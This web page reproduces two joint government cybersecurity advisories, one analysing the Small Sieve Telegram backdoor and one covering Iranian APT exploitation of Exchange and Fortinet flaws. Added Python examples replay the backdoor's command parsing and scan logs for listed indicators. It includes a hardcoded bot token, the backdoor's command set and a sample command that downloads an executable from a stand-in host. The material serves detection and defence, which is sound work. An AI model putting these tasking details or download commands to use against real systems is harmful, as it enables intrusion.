Bot ID Random value between 10,000,000 and 90,000,000  This is a bot identifier generated at startup that is sent to the C2 in the initial beacon. Commands must be prefixed with /com[Bot ID] in order to be processed by the malware.
Telegram Token  2003026094: AAGoitvpcx3SFZ2_6YzIs4La_kyDF1PbXrY  This is the initial token used to authenticate each message to the Telegram Bot API.

Tasking 

Small Sieve beacons via the Telegram Bot API, sending the configured Bot ID, the currently logged-in user, and the host’s IP address, as described in the Communications (Beacon format) section below. It then waits for tasking as a Telegram bot using the python-telegram-bot module. 

Two task formats are supported: 

  • /start – no argument is passed; this causes the beacon information to be repeated. 
  • /com[BotID] [command] – for issuing commands passed in the argument. 

The following commands are supported by the second of these formats, as described in table 5: 

Table 5: Supported Commands

Command Description
delete  This command causes the backdoor to exit; it does not remove persistence. 
download url””filename  The URL will be fetched and saved to the provided filename using the Python urllib module urlretrieve function.  
change token””newtoken  The backdoor will reconnect to the Telegram Bot API using the provided token newtoken. This updated token will be stored in the encoded MicrosoftWindowsOutlookDataPlus.txt file. 
disconnect  The original connection to Telegram is terminated. It is likely used after a change token command is issued. 

Any commands other than those detailed in table 5 are executed directly by passing them to cmd.exe /c, and the output is returned as a reply.
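To make the tasking rules in table 5 concrete, the following Python (an added example, not Small Sieve's code or NCSC-UK's analysis tooling) classifies Telegram Bot API updates the way the backdoor's handlers would: drop anything not from the hardcoded chat ID, accept /start, and require the /com<BotID> prefix before dispatching. It assumes that the argument separator rendered as a pair of quote characters in table 5 is the literal two-character string "" and that the prefix check is a plain string-prefix test; the sample updates and bot ID are constructed. The hex byte shuffling of figure 3 is not reproduced because that figure is not included on this page, so beacon_plaintext only builds the decoded form shown in figure 2.

```python
from dataclasses import dataclass
from typing import Optional

# Hardcoded Telegram chat ID from table 4; updates from any other chat are dropped.
CHAT_ID = 2090761833

# Separator between the two arguments of "download" and "change token". Table 5 shows it as
# a pair of quote characters; this example ASSUMES the literal two-character string '""'.
ARG_SEP = '""'


@dataclass
class Task:
    kind: str          # start | delete | download | change_token | disconnect | shell | malformed
    args: tuple = ()


def parse_update(update: dict, bot_id: int) -> Optional[Task]:
    """Classify one Telegram update as Small Sieve's handlers would.

    Returns None when the implant would ignore the message: wrong chat, or text that is
    neither /start nor prefixed with /com<BotID>.
    """
    message = update.get("message") or {}
    if (message.get("chat") or {}).get("id") != CHAT_ID:
        return None
    text = (message.get("text") or "").strip()
    if text == "/start":
        return Task("start")                       # beacon information is repeated
    prefix = f"/com{bot_id}"
    if not text.startswith(prefix):                # ASSUMPTION: plain prefix test
        return None
    command = text[len(prefix):].strip()
    if not command:
        return None
    if command == "delete":
        return Task("delete")                      # implant exits; persistence remains
    if command == "disconnect":
        return Task("disconnect")                  # original Telegram connection closed
    if command.startswith("download "):
        url, sep, filename = command[len("download "):].partition(ARG_SEP)
        if not sep or not url or not filename:
            return Task("malformed", (command,))
        return Task("download", (url, filename))   # urlretrieve(url, filename)
    if command.startswith("change token"):
        _, sep, token = command[len("change token"):].partition(ARG_SEP)
        if not sep or not token:
            return Task("malformed", (command,))
        return Task("change_token", (token,))      # reconnect with new bot token
    # Anything else is handed to cmd.exe /c and the output is returned as a reply.
    return Task("shell", (command,))


def beacon_plaintext(user: str, domain: str, ip: str) -> str:
    """Decoded beacon form from figure 2 ('admin/WINDOMAIN1 | 10.17.32.18'); the hex/shuffle
    encoding applied on the wire is not reproduced here."""
    return f"{user}/{domain} | {ip}"


def accepted_tasks(updates, bot_id: int) -> list:
    """Replay a list of updates (e.g. parsed getUpdates JSON) and keep only those the
    implant would act on, to reconstruct operator activity from captured traffic."""
    return [t for t in (parse_update(u, bot_id) for u in updates) if t is not None]


# --- Constructed sample updates (not real Telegram traffic) ------------------------------
SAMPLE_BOT_ID = 12345678
SAMPLE_UPDATES = [
    {"message": {"chat": {"id": CHAT_ID}, "text": "/start"}},
    {"message": {"chat": {"id": CHAT_ID}, "text": f"/com{SAMPLE_BOT_ID} whoami /all"}},
    {"message": {"chat": {"id": CHAT_ID},
                 "text": f'/com{SAMPLE_BOT_ID} download http://example.invalid/p.exe""C:\\Users\\Public\\p.exe'}},
    {"message": {"chat": {"id": CHAT_ID}, "text": f'/com{SAMPLE_BOT_ID} change token""1234:newtoken'}},
    {"message": {"chat": {"id": 1}, "text": f"/com{SAMPLE_BOT_ID} delete"}},   # wrong chat: dropped
    {"message": {"chat": {"id": CHAT_ID}, "text": "/com99 delete"}},            # wrong bot ID: dropped
]

if __name__ == "__main__":
    print(beacon_plaintext("admin", "WINDOMAIN1", "10.17.32.18"))
    for task in accepted_tasks(SAMPLE_UPDATES, SAMPLE_BOT_ID):
        print(task)
```

The point of the replay is the fall-through at the end: every message that is not one of the four named commands is a shell command, so a Telegram conversation with the bot is effectively an interactive cmd.exe session gated only by the chat ID and the bot-ID prefix.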

Defense Evasion 

Anti-Sandbox 

Figure 1: Execution Guardrail

Threat actors may be attempting to thwart simple analysis by not passing “Platypus” on the command line. 

String obfuscation 

Internal strings and new Telegram tokens are stored obfuscated with a custom alphabet and Base64-encoded. A string recovery script is shown in figure 4 (String Recovery Script) at the end of this appendix.

Communications 

Beacon Format 

Before listening for tasking using CommandHandler objects from the python-telegram-bot module, a beacon is generated manually using the standard requests library:

Figure 2: Manually Generated Beacon

The hex host data is encoded using the byte shuffling algorithm as described in the “Communications (Traffic obfuscation)” section of this report. The example in figure 2 decodes to: 

admin/WINDOMAIN1 | 10.17.32.18

Traffic obfuscation 

Although traffic to the Telegram Bot API is protected by TLS, Small Sieve obfuscates its tasking and responses using a hex byte shuffling algorithm. A Python 3 implementation is shown in figure 3.

Figure 3: Traffic Encoding Scheme Based on Hex Conversion and Shuffling

Detection 

Table 6 outlines indicators of compromise.

Table 6: Indicators of Compromise

Type Description Values
Path Telegram Session Persistence File (Obfuscated)  %LocalAppData%\MicrosoftWindowsOutlookDataPlus.txt 
Path Installation path of the Small Sieve binary  %AppData%\OutlookMicrosift\index.exe 
Registry value name Persistence Registry Key pointing to index.exe with a “Platypus” argument HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift 

String Recovery Script

Figure 4: String Recovery Script

Contact Information

To report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field-offices, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at [email protected]. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [email protected]. For NSA client requirements or general cybersecurity inquiries, contact the Cybersecurity Requirements Center at [email protected]. United Kingdom organizations should report a significant cyber security incident: ncsc.gov.uk/report-an-incident (monitored 24 hours) or for urgent assistance call 03000 200 973.

Revisions

February 24, 2022: Initial Version

Source…

Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities


Summary

Actions to Take Today to Protect Against Iranian State-Sponsored Malicious Cyber Activity
  • Immediately patch software affected by the following vulnerabilities: CVE-2021-34473, CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591.
  • Implement multi-factor authentication.
  • Use strong, unique passwords.

Note: this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, version 10. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.

This joint cybersecurity advisory is the result of an analytic effort among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), and the United Kingdom’s National Cyber Security Centre (NCSC) to highlight ongoing malicious cyber activity by an advanced persistent threat (APT) group that FBI, CISA, ACSC, and NCSC assess is associated with the government of Iran. FBI and CISA have observed this Iranian government-sponsored APT group exploit Fortinet vulnerabilities since at least March 2021 and a Microsoft Exchange ProxyShell vulnerability since at least October 2021 to gain initial access to systems in advance of follow-on operations, which include deploying ransomware. ACSC is also aware this APT group has used the same Microsoft Exchange vulnerability in Australia.

The Iranian government-sponsored APT actors are actively targeting a broad range of victims across multiple U.S. critical infrastructure sectors, including the Transportation Sector and the Healthcare and Public Health Sector, as well as Australian organizations. FBI, CISA, ACSC, and NCSC assess the actors are focused on exploiting known vulnerabilities rather than targeting specific sectors. These Iranian government-sponsored APT actors can leverage this access for follow-on operations, such as data exfiltration or encryption, ransomware, and extortion.

This advisory provides observed tactics and techniques, as well as indicators of compromise (IOCs) that FBI, CISA, ACSC, and NCSC assess are likely associated with this Iranian government-sponsored APT activity.

The FBI, CISA, ACSC, and NCSC urge critical infrastructure organizations to apply the recommendations listed in the Mitigations section of this advisory to mitigate risk of compromise from Iranian government-sponsored cyber actors.

For more information on Iranian government-sponsored malicious cyber activity, see us-cert.cisa.gov/Iran.

Click here for a PDF version of this report.

Technical Details

Threat Actor Activity

Since at least March 2021, the FBI and CISA have observed Iranian government-sponsored APT actors leverage Microsoft Exchange and Fortinet vulnerabilities to target a broad range of victims across multiple critical infrastructure sectors in furtherance of malicious activities. Observed activity includes the following.

ACSC considers that this APT group has also used the same Microsoft Exchange vulnerability (CVE-2021-34473) in Australia.

MITRE ATT&CK Tactics and Techniques

FBI, CISA, ACSC, and NCSC assess the following tactics and techniques are associated with this activity.

Resource Development [TA0042]

The APT actors have used the following malicious and legitimate tools [T1588.001, T1588.002] for a variety of tactics across the enterprise spectrum.

  • Mimikatz for credential theft [TA0006]
  • WinPEAS for privilege escalation [TA0004]
  • SharpWMI (Windows Management Instrumentation)
  • WinRAR for archiving collected data [TA0009, T1560.001]
  • FileZilla for transferring files [TA0010]

Initial Access [TA0001]

The Iranian government-sponsored APT actors gained initial access by exploiting vulnerabilities affecting Microsoft Exchange servers (CVE-2021-34473) and Fortinet devices (CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591) [T1190].

Execution [TA0002]

The Iranian government-sponsored APT actors may have made modifications to the Task Scheduler [T1053.005]. These modifications may display as unrecognized scheduled tasks or actions. Specifically, the below established tasks may be associated with this activity:

  • SynchronizeTimeZone
  • GoogleChangeManagement
  • MicrosoftOutLookUpdater
  • MicrosoftOutLookUpdateSchedule

Persistence [TA0003]

The Iranian government-sponsored APT actors may have established new user accounts on domain controllers, servers, workstations, and active directories [T1136.001, T1136.002]. Some of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization. In addition to unrecognized user accounts or accounts established to masquerade as existing accounts, the following account usernames may be associated with this activity:

  • Support
  • Help
  • elie
  • WADGUtilityAccount

Exfiltration [TA0010]

The FBI and CISA observed outbound File Transfer Protocol (FTP) transfers over port 443.

Impact [TA0040]

The APT actors forced BitLocker activation on host networks to encrypt data [T1486]. The corresponding threatening notes were either sent to the victim or left on the victim network as a .txt file. The ransom notes included ransom demands and the following contact information. 

  • sar_addr@protonmail[.]com
  • WeAreHere@secmail[.]pro
  • nosterrmann@mail[.]com
  • nosterrmann@protonmail[.]com 

Detection

The FBI, CISA, ACSC, and NCSC recommend that organizations using Microsoft Exchange servers and Fortinet investigate potential suspicious activity in their networks. 

  • Search for IOCs. Collect known-bad IOCs and search for them in network and host artifacts. Note: refer to Appendix A for IOCs.
  • Investigate exposed Microsoft Exchange servers (both patched and unpatched) for compromise. 
  • Investigate changes to Remote Desktop Protocol (RDP), firewall, and Windows Remote Management (WinRM) configurations that may allow attackers to maintain persistent access. 
  • Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.
  • Review Task Scheduler for unrecognized scheduled tasks. Additionally, manually review operating-system defined or recognized scheduled tasks for unrecognized “actions” (for example, review the steps each scheduled task is expected to perform).
  • Review antivirus logs for indications they were unexpectedly turned off.
  • Look for WinRAR and FileZilla in unexpected locations. 
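The first item above, collecting the known-bad IOCs and searching host and network artifacts for them, is shown below as an added example (not CISA's or FBI's tooling). Advisories print indicators defanged (`91.214.124[.]143`), so the script refangs them first, then scans two constructed artifacts: a key=value firewall log, which is also checked for the FTP-over-port-443 pattern noted under Exfiltration, and a hash listing of the kind produced by sha256sum or Get-FileHash. The IP addresses, hashes and filenames are taken from Appendix A of this advisory; the log format and sample lines are assumptions.

```python
"""Search constructed host and network artifacts for the advisory's IOCs."""
import re

# Appendix A, as printed (defanged).
DEFANGED_IPS = ["91.214.124[.]143", "162.55.137[.]20", "154.16.192[.]70"]

# Subset of Table 1 hashes (lower-case) mapped to what the advisory says they are.
KNOWN_HASHES = {
    "1444884faed804667d8c2bfa0d63ab13": "MicrosoftOutLookUpdater.exe (MD5)",
    "c51fe5073bd493c7e8d83365aace3f9911437a0f2ae80042ba01ea46b55d2624": "MicrosoftOutLookUpdater.exe (SHA-256)",
    "e64064f76e59dea46a0768993697ef2f": "Connector3.exe (MD5)",
    "b90f05b5e705e0b0cb47f51b985f84db": "Audio.exe / frpc.exe (MD5)",
    "28332bdbfaeb8333dad5ada3c10819a1a015db9106d5e8a74beaaf03797511aa": "Audio.exe / frpc.exe (SHA-256)",
    "26f330dadcdd717ef575aa5bfcdbe76a": "Frps.exe (MD5)",
    "d7982ffe09f947e5b4237c9477af73a034114af03968e3c4ce462a029f072a5a": "Frps.exe (SHA-256)",
}

# Filenames from Table 1 (lower-case); frpc/frps are a public tool, so a name
# hit alone means "review where it is and who put it there".
ADVISORY_FILENAMES = {
    "microsoftoutlookupdater.exe", "microsoftoutlookupdater.bat", "microsoftoutlookupdater.xml",
    "googlechangemanagement.xml", "connector3.exe", "audio.exe", "frpc.exe", "frps.exe",
}


def refang(indicator: str) -> str:
    """Undo the defanging conventions used in published IOC lists."""
    return indicator.replace("[.]", ".").replace("[:]", ":").replace("hxxp", "http")


IOC_IPS = {refang(ip) for ip in DEFANGED_IPS}
KV_RE = re.compile(r"(\w+)=(\S+)")
HASH_RE = re.compile(r"\b([0-9a-fA-F]{64}|[0-9a-fA-F]{40}|[0-9a-fA-F]{32})\b")


def scan_network_log(lines):
    """Flag lines that talk to an IOC address or carry FTP over port 443."""
    hits = []
    for n, line in enumerate(lines, 1):
        fields = dict(KV_RE.findall(line))
        reasons = []
        for key in ("src", "dst"):
            if fields.get(key) in IOC_IPS:
                reasons.append(f"{key} {fields[key]} is an advisory IOC")
        if fields.get("app") == "ftp" and fields.get("dport") == "443":
            reasons.append("FTP on port 443 (outbound FTP over 443 is noted under Exfiltration)")
        if reasons:
            hits.append({"line": n, "reasons": reasons, "text": line.strip()})
    return hits


def scan_hash_listing(lines):
    """Flag Table 1 hashes and filenames the advisory associates with the activity."""
    hits = []
    for n, line in enumerate(lines, 1):
        reasons = []
        for h in HASH_RE.findall(line):
            if h.lower() in KNOWN_HASHES:
                reasons.append(f"hash matches {KNOWN_HASHES[h.lower()]}")
        parts = line.split(None, 1)          # "<hash>  <path>"
        if len(parts) == 2:
            basename = re.split(r"[\\/]", parts[1].strip())[-1].lower()
            if basename in ADVISORY_FILENAMES:
                reasons.append(f"filename {basename} is on the advisory list")
        if reasons:
            hits.append({"line": n, "reasons": reasons, "text": line.strip()})
    return hits


# Constructed firewall log (assumed key=value format; 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges, not real destinations).
SAMPLE_FIREWALL_LOG = [
    "2021-11-01T10:02:11Z src=10.20.30.40 dst=91.214.124.143 dport=443 app=ssl action=allow",
    "2021-11-01T10:05:42Z src=10.20.30.41 dst=203.0.113.9 dport=443 app=ftp action=allow",
    "2021-11-01T10:07:03Z src=10.20.30.42 dst=198.51.100.7 dport=443 app=ssl action=allow",
]

# Constructed hash listing; the tzsync.exe hash is made up and matches nothing.
SAMPLE_HASH_LISTING = [
    r"c51fe5073bd493c7e8d83365aace3f9911437a0f2ae80042ba01ea46b55d2624  C:\ProgramData\MicrosoftOutLookUpdater.exe",
    r"0f343b0931126a20f133d67c2b018a3b1b2c3d4e5f60718293a4b5c6d7e8f901  C:\Windows\System32\tzsync.exe",
    r"b90f05b5e705e0b0cb47f51b985f84db  C:\Users\Public\Audio.exe",
]

if __name__ == "__main__":
    for hit in scan_network_log(SAMPLE_FIREWALL_LOG) + scan_hash_listing(SAMPLE_HASH_LISTING):
        print(f"line {hit['line']}: {'; '.join(hit['reasons'])}\n    {hit['text']}")
```

Hash matching is done on lower-cased values because Table 1 mixes upper- and lower-case hex; the FTP-on-443 check depends on a firewall or proxy that identifies the application rather than trusting the port, which is exactly the mismatch the Exfiltration section describes.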

Note: for additional approaches on uncovering malicious cyber activity, see joint advisory Technical Approaches to Uncovering and Remediating Malicious Activity, authored by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom. 

Mitigations

The FBI, CISA, ACSC, and NCSC urge network defenders to apply the following mitigations to reduce the risk of compromise by this threat.

Patch and Update Systems

  • Install updates/patch operating systems, software, and firmware as soon as updates/patches are released. 
  • Immediately patch software affected by vulnerabilities identified in this advisory: CVE-2021-34473, CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591.

Evaluate and Update Blocklists and Allowlists

  • Regularly evaluate and update blocklists and allowlists.
  • If FortiOS is not used by your organization, add the key artifact files used by FortiOS to your organization’s execution blocklist. Any attempts to install or run this program and its associated files should be prevented.

Implement and Enforce Backup and Restoration Policies and Procedures

  • Regularly back up data, air gap, and password protect backup copies offline.
  • Ensure copies of critical data are not accessible for modification or deletion from the system where the data resides. 
  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud). 

Implement Network Segmentation

  • Implement network segmentation to restrict adversary’s lateral movement. 

Secure User Accounts

  • Audit user accounts with administrative privileges and configure access controls under the principles of least privilege and separation of duties. 
  • Require administrator credentials to install software. 

Implement Multi-Factor Authentication

  • Use multifactor authentication where possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems. 

Use Strong Passwords

  • Require all accounts with password logins to have strong, unique passwords.

Secure and Monitor RDP and other Potentially Risky Services

  • If you use RDP, restrict it to limit access to resources over internal networks.
  • Disable unused remote access/RDP ports.
  • Monitor remote access/RDP logs. 

Use Antivirus Programs

  • Install and regularly update antivirus and anti-malware software on all hosts. 

Secure Remote Access

  • Only use secure networks and avoid using public Wi-Fi networks. 
  • Consider installing and using a VPN for remote access.

Reduce Risk of Phishing

  • Consider adding an email banner to emails received from outside your organization.
  • Disable hyperlinks in received emails.

Resources

  • For more information on Iranian government-sponsored malicious cyber activity, see us-cert.cisa.gov/Iran
  • For information and resources on protecting against and responding to ransomware, refer to StopRansomware.gov, a centralized, whole-of-government webpage providing ransomware resources and alerts.
  • The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States: Technical Approaches to Uncovering and Remediating Malicious Activity provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.
  • CISA offers a range of no-cost cyber hygiene services to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.
  • The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the RFJ website for more information and how to report information securely.
  • ACSC can provide tailored cyber security advice and assistance, reporting, and incident response support at cyber.gov.au and via 1300 292 371 (1300 CYBER1).

Appendix A: Indicators of Compromise

IP addresses and executable files are listed below.

IP Addresses

  • 91.214.124[.]143 
  • 162.55.137[.]20 
  • 154.16.192[.]70

Executable Files 

Executable files observed in this activity are identified in table 1.

Table 1: Executable Files 

Filename: MicrosoftOutLookUpdater[.]exe
MD5: 1444884faed804667d8c2bfa0d63ab13
SHA-1: 95E045446EFB8C9983EBFD85E39B4BE5D92C7A2A
SHA-256: c51fe5073bd493c7e8d83365aace3f9911437a0f2ae80042ba01ea46b55d2624
SHA-512: 6451077B99C5F8ECC5C0CA88FE272156296BEB91218B39AE28A086DBA5E7E39813F044F9AF0FEDBB260941B1CD52FA237C098CBF4B2A822F08E3E98E934D0ECF

Filename: MicrosoftOutlookUpdater.bat
MD5: 1A44368EB5BF68688BA4B4357BDC874F
SHA-1: FA36FEBFD5A5CA0B3A1B19005B952683A7188A13
SHA-256: 3A08D0CB0FF4D95ED0896F22F4DA8755525C243C457BA6273E08453E0E3AC4C4
SHA-512: 70AA89449EB5DA1D84B70D114EF9D24CB74751CE12D12C783251E51775C89FDCE61B4265B43B1D613114D6A85E9C75927B706F39C576DBB036079C7E8CAF28B2

Filename: MicrosoftOutlookUpdater.xml
MD5: AA40C49E309959FA04B7E5AC111BB770
SHA-1: F1D90E10E6E3654654E0A677763C9767C913F8F0
SHA-256: 5C818FE43F05F4773AD20E0862280B0D5C66611BB12459A08442F55F148400A6
SHA-512: E55A86159F2E869DCDB64FDC730DA893718E20D65A04071770BD32CAE75FF8C34704BDF9F72EF055A3B362759EDE3682B3883C4D9BCF87013076638664E8078E

Filename: GoogleChangeManagement.xml
MD5: AF2D86042602CBBDCC7F1E8EFA6423F9
SHA-1: CDCD97F946B78831A9B88B0A5CD785288DC603C1
SHA-256: 4C691CCD811B868D1934B4B8E9ED6D5DB85EF35504F85D860E8FD84C547EBF1D
SHA-512: 6473DAC67B75194DEEAEF37103BBA17936F6C16FFCD2A7345A5A46756996FAD748A97F36F8FD4BE4E1F264ECE313773CC5596099D68E71344D8135F50E5D8971

Filename: Connector3.exe
MD5: e64064f76e59dea46a0768993697ef2f

Filename: Audio.exe or frpc.exe
MD5: b90f05b5e705e0b0cb47f51b985f84db
SHA-1: 5bd0690247dc1e446916800af169270f100d089b
SHA-256: 28332bdbfaeb8333dad5ada3c10819a1a015db9106d5e8a74beaaf03797511aa
Vhash: 017067555d5d15541az28!z
Authentihash: ed463da90504f3adb43ab82044cddab8922ba029511da9ad5a52b8c20bda65ee
Imphash: 93a138801d9601e4c36e6274c8b9d111
SSDEEP: 98304:MeOuFco2Aate8mjOaFEKC8KZ1F4ANWyJXf/X+g4:MeHFV2AatevjOaDC8KZ1xNWy93U
Note: identical to “frpc.exe” available at https://github[.]com/fatedier/frp/releases/download/v0.34.3/frp_0.34.3_windows_amd64.zip

Filename: Frps.exe
MD5: 26f330dadcdd717ef575aa5bfcdbe76a
SHA-1: c4160aa55d092cf916a98f3b3ee8b940f2755053
SHA-256: d7982ffe09f947e5b4237c9477af73a034114af03968e3c4ce462a029f072a5a
Vhash: 017057555d6d141az25!z
Authentihash: 40ed1568fef4c5f9d03c370b2b9b06a3d0bd32caca1850f509223b3cee2225ea
Imphash: 91802a615b3a5c4bcc05bc5f66a5b219
SSDEEP: 196608:/qTLyGAlLrOt8enYfrhkhBnfY0NIPvoOQiE:GLHiLrSfY5voO
Note: identical to “frps.exe” available at https://github[.]com/fatedier/frp/releases/download/v0.33.0/frp_0.33.0_windows_amd64.zip

Appendix B: MITRE ATT&CK Tactics and Techniques

Table 2 identifies MITRE ATT&CK Tactics and techniques observed in this activity.

Table 2: Observed Tactics and Techniques

Contact Information

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at https://www.fbi.gov/contact-us/field-offices, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [email protected]. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [email protected]. Australian organizations can visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.

Revisions

Initial Version: November 17, 2021
